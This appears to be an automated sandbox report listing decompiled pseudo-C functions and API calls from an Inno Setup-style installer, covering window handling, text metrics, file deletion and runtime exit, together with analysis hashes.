                                                            				if( *0x6d5822 != 0) {
                                                            					_t24 = E00414DA0(0, L"TWindowDisabler-Window", 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0x88000000); // executed
                                                            					_t51 = _t24;
                                                            					 *((intOrPtr*)(_t49 + 8)) = _t51;
                                                            					if(_t51 != 0) {
                                                            						_t5 = _t49 + 8; // 0x4134a000
                                                            						_t27 =  *0x6cdec4; // 0x6d579c
                                                            						E005B8044( *_t27,  &_v8);
                                                            						E0040B278(_v8);
                                                            						_t33 = E00414DA0(0, L"TWindowDisabler-Window", 0,  *0x6d2634, 0,  *_t5, 0, 0, 0, 0, 0x80000000); // executed
                                                            						_t52 = _t33;
                                                            						 *(_t49 + 4) = _t52;
                                                            						if(_t52 != 0) {
                                                            							ShowWindow(_t52, 8); // executed
                                                            						}
                                                            					}
                                                            				}
                                                            				SetFocus(0);
                                                            				_pop(_t44);
                                                            				 *[fs:eax] = _t44;
                                                            				_push(E005C93E1);
                                                            				return E0040A1C8( &_v8);
                                                            			}

















                                                            APIs
                                                            • GetActiveWindow.USER32 ref: 005C92F7
                                                            • GetFocus.USER32 ref: 005C92FF
                                                            • RegisterClassW.USER32 ref: 005C9320
                                                            • ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
                                                            • SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FocusWindow$ActiveClassRegisterShow
                                                            • String ID: TWindowDisabler-Window
                                                            • API String ID: 495420250-1824977358
                                                            • Opcode ID: f6024229119579bb9558f94a5f3e2433b374e9a692c523404650e8e6a3f60a8b
                                                            • Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
                                                            • Opcode Fuzzy Hash: f6024229119579bb9558f94a5f3e2433b374e9a692c523404650e8e6a3f60a8b
                                                            • Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			_entry_() {
                                                            				intOrPtr* _t12;
                                                            				signed int _t15;
                                                            				intOrPtr _t21;
                                                            				intOrPtr* _t22;
                                                            				intOrPtr* _t28;
                                                            				intOrPtr* _t31;
                                                            				intOrPtr* _t35;
                                                            				intOrPtr _t36;
                                                            				void* _t61;
                                                            				void* _t62;
                                                            				intOrPtr* _t73;
                                                            				intOrPtr* _t76;
                                                            				intOrPtr _t77;
                                                            				intOrPtr _t79;
                                                            				intOrPtr _t81;
                                                            				intOrPtr _t82;
                                                            				intOrPtr _t83;
                                                            				void* _t84;
                                                            				void* _t86;
                                                            				intOrPtr* _t88;
                                                            				intOrPtr _t89;
                                                            				void* _t90;
                                                            				intOrPtr _t92;
                                                            				void* _t93;
                                                            
                                                            				E00410BA8(0x6b9a98);
                                                            				_t12 =  *0x6cdec4; // 0x6d579c
                                                            				_t15 = GetWindowLongW( *( *_t12 + 0x188), 0xffffffec);
                                                            				_t73 =  *0x6cdec4; // 0x6d579c
                                                            				SetWindowLongW( *( *_t73 + 0x188), 0xffffffec, _t15 & 0xffffff7f); // executed
                                                            				_push(_t88);
                                                            				_push(0x6c46f1);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t89;
                                                            				SetErrorMode(1); // executed
                                                            				E006B9800(_t90);
                                                            				_t21 =  *0x6b96c0; // 0x6b9718
                                                            				_t22 =  *0x6cdec4; // 0x6d579c
                                                            				E005B8740( *_t22, E006B9758, _t21);
                                                            				_t76 =  *0x6cdd3c; // 0x6d57d8
                                                            				 *_t76 = 0x6b4380;
                                                            				E006B9870(_t62, _t84, _t86, _t90, _t93);
                                                            				_pop(_t77);
                                                            				 *[fs:eax] = _t77;
                                                            				_t28 =  *0x6cdec4; // 0x6d579c
                                                            				E005B8250( *_t28, L"Setup", _t90);
                                                            				_t31 =  *0x6cdec4; // 0x6d579c
                                                            				ShowWindow( *( *_t31 + 0x188), 5);
                                                            				_t35 =  *0x6cdec4; // 0x6d579c
                                                            				_t36 =  *_t35;
                                                            				_t79 =  *0x6a6ef4; // 0x6a6f4c
                                                            				 *((intOrPtr*)(_t36 + 0x10c)) = _t79;
                                                            				 *((intOrPtr*)(_t36 + 0x108)) = 0x6b3994;
                                                            				_push(_t88);
                                                            				_push(0x6c479a);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t89;
                                                            				E005B881C(); // executed
                                                            				L006B09B0(_t62, _t84, _t86, _t93);
                                                            				L005B8834( *((intOrPtr*)( *0x6cdec4)), _t62,  *0x6cdab4,  *0x6a6ef4, _t84, _t86);
                                                            				L006B3B64(_t90, _t93);
                                                            				_pop(_t81);
                                                            				 *[fs:eax] = _t81;
                                                            				_push(_t88);
                                                            				_push(0x6c481d);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t89;
                                                            				L005B8990( *((intOrPtr*)( *0x6cdec4)), _t62, _t84, _t86);
                                                            				_pop(_t82);
                                                            				 *[fs:eax] = _t82;
                                                            				_push(_t88);
                                                            				_push(0x6c4854);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t89;
                                                            				L006B2AB0( *0x6cdcd4 & 0xffffff00 |  *( *0x6cdcd4) == 0x00000000, _t62, _t84, _t86,  *( *0x6cdcd4));
                                                            				_pop(_t83);
                                                            				 *[fs:eax] = _t83;
                                                            				_t61 = E0040A028( *( *0x6cdcd4));
                                                            				E00409EF8();
                                                            				 *((intOrPtr*)(_t61 - 0xfffdfc)) =  *((intOrPtr*)(_t61 - 0xfffdfc)) + _t83;
                                                            				asm("invalid");
                                                            				 *0x53000000 =  *0x53000000 + 1;
                                                            				 *_t88 =  *_t88 + _t61;
                                                            				_t92 =  *_t88;
                                                            				if (_t92 == 0) goto L5;
                                                            				if (_t92 != 0) goto L6;
                                                            				if (_t92 < 0) goto 0x6c488e;
                                                            			}




























                                                            APIs
                                                              • Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006C4683
                                                            • SetWindowLongW.USER32 ref: 006C469F
                                                            • SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4
                                                              • Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                              • Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765
                                                              • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                            • String ID: Loj$Setup
                                                            • API String ID: 1533765661-1180797960
                                                            • Opcode ID: 3d0304c784d3bd607acd89935b1016d88a71efec8a9d6f2a7abca0b2f7454e11
                                                            • Instruction ID: d4d45baa3e9a68820d1f8b3b63154724c7fffc608bd47f906fb52fcab16a7fb3
                                                            • Opcode Fuzzy Hash: 3d0304c784d3bd607acd89935b1016d88a71efec8a9d6f2a7abca0b2f7454e11
                                                            • Instruction Fuzzy Hash: BE216D782046009FD700EF29DC91DA67BFAEB9E71071145B8F9008B3A2CE74BC80CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E005CE26C(void* __eax, void* __ebx, long* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				struct HDC__* _v8;
                                                            				struct tagSIZE _v16;
                                                            				struct tagTEXTMETRICW _v76;
                                                            				signed int _t26;
                                                            				signed int _t27;
                                                            				void* _t36;
                                                            				intOrPtr _t43;
                                                            				long* _t45;
                                                            				signed int* _t47;
                                                            				void* _t50;
                                                            
                                                            				_t37 = __ecx;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_t45 = __ecx;
                                                            				_t47 = __edx;
                                                            				_t36 = __eax;
                                                            				_v8 = GetDC(0);
                                                            				_push(_t50);
                                                            				_push(0x5ce2f8);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t50 + 0xffffffb8;
                                                            				SelectObject(_v8, E004EE238(_t36, _t36, _t37, _t45, _t47));
                                                            				GetTextExtentPointW(_v8, L"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v16); // executed
                                                            				asm("cdq");
                                                            				_t26 = _v16.cx / 0x1a + 1;
                                                            				_t27 = _t26 >> 1;
                                                            				if(_t26 < 0) {
                                                            					asm("adc eax, 0x0");
                                                            				}
                                                            				 *_t47 = _t27;
                                                            				GetTextMetricsW(_v8,  &_v76);
                                                            				 *_t45 = _v76.tmHeight;
                                                            				_pop(_t43);
                                                            				 *[fs:eax] = _t43;
                                                            				_push(E005CE2FF);
                                                            				return ReleaseDC(0, _v8);
                                                            			}














                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 005CE27D
                                                              • Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280
                                                            • SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                            • GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
                                                            • GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                            • ReleaseDC.USER32 ref: 005CE2F2
                                                            Strings
                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 1334710084-222967699
                                                            • Opcode ID: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                            • Instruction ID: 68d2e7468c57547273e36bf030651d7f5f3d68c5ac32077f2b8cb66f1dd3ef54
                                                            • Opcode Fuzzy Hash: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                            • Instruction Fuzzy Hash: 8E01847AA14204BFE704DEE9CC42F9EB7ECEB49704F510469F604E7280D678AD008724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E00423A20(void* __eax) {
                                                            				signed char _t10;
                                                            				void* _t14;
                                                            				void* _t15;
                                                            				long _t16;
                                                            				void* _t17;
                                                            				WCHAR* _t18;
                                                            
                                                            				_t17 = __eax;
                                                            				_t18 = E0040B278(__eax);
                                                            				DeleteFileW(_t18); // executed
                                                            				asm("sbb ebx, ebx");
                                                            				_t15 = _t14 + 1;
                                                            				if(_t15 == 0) {
                                                            					_t16 = GetLastError();
                                                            					_t10 = GetFileAttributesW(_t18); // executed
                                                            					if(_t10 == 0xffffffff || (_t10 & 0x00000004) == 0 || (_t10 & 0x00000010) == 0) {
                                                            						SetLastError(_t16);
                                                            					} else {
                                                            						RemoveDirectoryW(E0040B278(_t17));
                                                            						asm("sbb ebx, ebx");
                                                            						_t15 = _t15 + 1;
                                                            					}
                                                            				}
                                                            				return _t15;
                                                            			}










                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                            • GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                            • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                            • String ID:
                                                            • API String ID: 2814369299-0
                                                            • Opcode ID: df722b0e1309f9a81f5fce9d005c1b6d287d6fd7d419b4baf17ebfa420ffd0ff
                                                            • Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
                                                            • Opcode Fuzzy Hash: df722b0e1309f9a81f5fce9d005c1b6d287d6fd7d419b4baf17ebfa420ffd0ff
                                                            • Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E00409EF8() {
                                                            				void* _t20;
                                                            				void* _t23;
                                                            				intOrPtr _t31;
                                                            				intOrPtr* _t33;
                                                            				void* _t46;
                                                            				struct HINSTANCE__* _t49;
                                                            				void* _t56;
                                                            
                                                            				if( *0x6c5004 != 0) {
                                                            					E00409DD8();
                                                            					E00409E60(_t46);
                                                            					 *0x6c5004 = 0;
                                                            				}
                                                            				if( *0x6d1bd0 != 0 && GetCurrentThreadId() ==  *0x6d1bf8) {
                                                            					E00409B30(0x6d1bcc);
                                                            					E00409E34(0x6d1bcc);
                                                            				}
                                                            				if( *0x006D1BC4 != 0 ||  *0x6cf058 == 0) {
                                                            					L8:
                                                            					if( *((char*)(0x6d1bc4)) == 2 &&  *0x6c5000 == 0) {
                                                            						 *0x006D1BA8 = 0;
                                                            					}
                                                            					if( *((char*)(0x6d1bc4)) != 0) {
                                                            						L14:
                                                            						E00409B58(); // executed
                                                            						if( *((char*)(0x6d1bc4)) <= 1 ||  *0x6c5000 != 0) {
                                                            							_t15 =  *0x006D1BAC;
                                                            							if( *0x006D1BAC != 0) {
                                                            								E0040EBB8(_t15);
                                                            								_t31 =  *((intOrPtr*)(0x6d1bac));
                                                            								_t8 = _t31 + 0x10; // 0x400000
                                                            								_t49 =  *_t8;
                                                            								_t9 = _t31 + 4; // 0x400000
                                                            								if(_t49 !=  *_t9 && _t49 != 0) {
                                                            									FreeLibrary(_t49);
                                                            								}
                                                            							}
                                                            						}
                                                            						E00409B30(0x6d1b9c);
                                                            						if( *((char*)(0x6d1bc4)) == 1) {
                                                            							 *0x006D1BC0();
                                                            						}
                                                            						if( *((char*)(0x6d1bc4)) != 0) {
                                                            							E00409E34(0x6d1b9c);
                                                            						}
                                                            						if( *0x6d1b9c == 0) {
                                                            							if( *0x6cf038 != 0) {
                                                            								 *0x6cf038();
                                                            							}
                                                            							ExitProcess( *0x6c5000); // executed
                                                            						}
                                                            						memcpy(0x6d1b9c,  *0x6d1b9c, 0xc << 2);
                                                            						_t56 = _t56 + 0xc;
                                                            						0x6c5000 = 0x6c5000;
                                                            						0x6d1b9c = 0x6d1b9c;
                                                            						goto L8;
                                                            					} else {
                                                            						_t20 = E00406FD0();
                                                            						_t44 = _t20;
                                                            						if(_t20 == 0) {
                                                            							goto L14;
                                                            						} else {
                                                            							goto L13;
                                                            						}
                                                            						do {
                                                            							L13:
                                                            							E00408444(_t44);
                                                            							_t23 = E00406FD0();
                                                            							_t44 = _t23;
                                                            						} while (_t23 != 0);
                                                            						goto L14;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t33 =  *0x6cf058; // 0x0
                                                            						 *0x6cf058 = 0;
                                                            						 *_t33();
                                                            					} while ( *0x6cf058 != 0);
                                                            					L8:
                                                            					while(1) {
                                                            					}
                                                            				}
                                                            			}











                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                            • Instruction ID: e2cc099636b1ff89dc3d2fe7d8b391202ea9480b4d839bd65efd70e323d436a8
                                                            • Opcode Fuzzy Hash: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                            • Instruction Fuzzy Hash: 60316F20B006429AD720AB7A9484B2777E66B44328F14053FE449E62E3D7BCDCC4C75D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E00409EF0() {
                                                            				intOrPtr* _t14;
                                                            				void* _t23;
                                                            				void* _t26;
                                                            				intOrPtr _t34;
                                                            				intOrPtr* _t36;
                                                            				void* _t50;
                                                            				struct HINSTANCE__* _t53;
                                                            				void* _t62;
                                                            
                                                            				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
                                                            				if( *0x6c5004 != 0) {
                                                            					E00409DD8();
                                                            					E00409E60(_t50);
                                                            					 *0x6c5004 = 0;
                                                            				}
                                                            				if( *0x6d1bd0 != 0 && GetCurrentThreadId() ==  *0x6d1bf8) {
                                                            					E00409B30(0x6d1bcc);
                                                            					E00409E34(0x6d1bcc);
                                                            				}
                                                            				if( *0x006D1BC4 != 0 ||  *0x6cf058 == 0) {
                                                            					L9:
                                                            					if( *((char*)(0x6d1bc4)) == 2 &&  *0x6c5000 == 0) {
                                                            						 *0x006D1BA8 = 0;
                                                            					}
                                                            					if( *((char*)(0x6d1bc4)) != 0) {
                                                            						L15:
                                                            						E00409B58(); // executed
                                                            						if( *((char*)(0x6d1bc4)) <= 1 ||  *0x6c5000 != 0) {
                                                            							_t18 =  *0x006D1BAC;
                                                            							if( *0x006D1BAC != 0) {
                                                            								E0040EBB8(_t18);
                                                            								_t34 =  *((intOrPtr*)(0x6d1bac));
                                                            								_t8 = _t34 + 0x10; // 0x400000
                                                            								_t53 =  *_t8;
                                                            								_t9 = _t34 + 4; // 0x400000
                                                            								if(_t53 !=  *_t9 && _t53 != 0) {
                                                            									FreeLibrary(_t53);
                                                            								}
                                                            							}
                                                            						}
                                                            						E00409B30(0x6d1b9c);
                                                            						if( *((char*)(0x6d1bc4)) == 1) {
                                                            							 *0x006D1BC0();
                                                            						}
                                                            						if( *((char*)(0x6d1bc4)) != 0) {
                                                            							E00409E34(0x6d1b9c);
                                                            						}
                                                            						if( *0x6d1b9c == 0) {
                                                            							if( *0x6cf038 != 0) {
                                                            								 *0x6cf038();
                                                            							}
                                                            							ExitProcess( *0x6c5000); // executed
                                                            						}
                                                            						memcpy(0x6d1b9c,  *0x6d1b9c, 0xc << 2);
                                                            						_t62 = _t62 + 0xc;
                                                            						0x6c5000 = 0x6c5000;
                                                            						0x6d1b9c = 0x6d1b9c;
                                                            						goto L9;
                                                            					} else {
                                                            						_t23 = E00406FD0();
                                                            						_t48 = _t23;
                                                            						if(_t23 == 0) {
                                                            							goto L15;
                                                            						} else {
                                                            							goto L14;
                                                            						}
                                                            						do {
                                                            							L14:
                                                            							E00408444(_t48);
                                                            							_t26 = E00406FD0();
                                                            							_t48 = _t26;
                                                            						} while (_t26 != 0);
                                                            						goto L15;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t36 =  *0x6cf058; // 0x0
                                                            						 *0x6cf058 = 0;
                                                            						 *_t36();
                                                            					} while ( *0x6cf058 != 0);
                                                            					L9:
                                                            					while(1) {
                                                            					}
                                                            				}
                                                            			}












                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                            • Instruction ID: 07d30fd0877b4d42c88f7c1dd8669400ca79996a2773cdc214a63d44a36a60ff
                                                            • Opcode Fuzzy Hash: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                            • Instruction Fuzzy Hash: C4316E20A007828ADB21AB769494B2777E26F15318F14487FE049E62E3D7BCDCC4C71E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 92%
                                                            			E004785F8(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                                            				struct _WNDCLASSW _v44;
                                                            				WCHAR* _t8;
                                                            				int _t10;
                                                            				void* _t11;
                                                            				struct HWND__* _t15;
                                                            				long _t17;
                                                            				WCHAR* _t20;
                                                            				struct HWND__* _t22;
                                                            				WCHAR* _t24;
                                                            
                                                            				 *0x6c7aa8 =  *0x6d2634;
                                                            				_t8 =  *0x6c7abc; // 0x4785dc
                                                            				_t10 = GetClassInfoW( *0x6d2634, _t8,  &_v44);
                                                            				asm("sbb eax, eax");
                                                            				_t11 = _t10 + 1;
                                                            				if(_t11 == 0 || L00414778 != _v44.lpfnWndProc) {
                                                            					if(_t11 != 0) {
                                                            						_t20 =  *0x6c7abc; // 0x4785dc
                                                            						UnregisterClassW(_t20,  *0x6d2634);
                                                            					}
                                                            					RegisterClassW(0x6c7a98);
                                                            				}
                                                            				_t24 =  *0x6c7abc; // 0x4785dc
                                                            				_t15 = E00414DA0(0x80, _t24, 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
                                                            				_t22 = _t15;
                                                            				if(_a6 != 0) {
                                                            					_t17 = E0047845C(_a4, _a8); // executed
                                                            					SetWindowLongW(_t22, 0xfffffffc, _t17);
                                                            				}
                                                            				return _t22;
                                                            			}













                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                            • String ID:
                                                            • API String ID: 4025006896-0
                                                            • Opcode ID: c13718059519df6099dbd22287901c2cd341ee5024df696f59e832b4f8273898
                                                            • Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
                                                            • Opcode Fuzzy Hash: c13718059519df6099dbd22287901c2cd341ee5024df696f59e832b4f8273898
                                                            • Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WaitForInputIdle.USER32 ref: 0060F004
                                                            • MsgWaitForMultipleObjects.USER32 ref: 0060F026
                                                            • GetExitCodeProcess.KERNEL32 ref: 0060F037
                                                            • CloseHandle.KERNEL32(00000001,0060F064,0060F05D,?,?,?,00000001,?,?,0060F406,?,00000000,0060F41C,?,?,?), ref: 0060F057
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
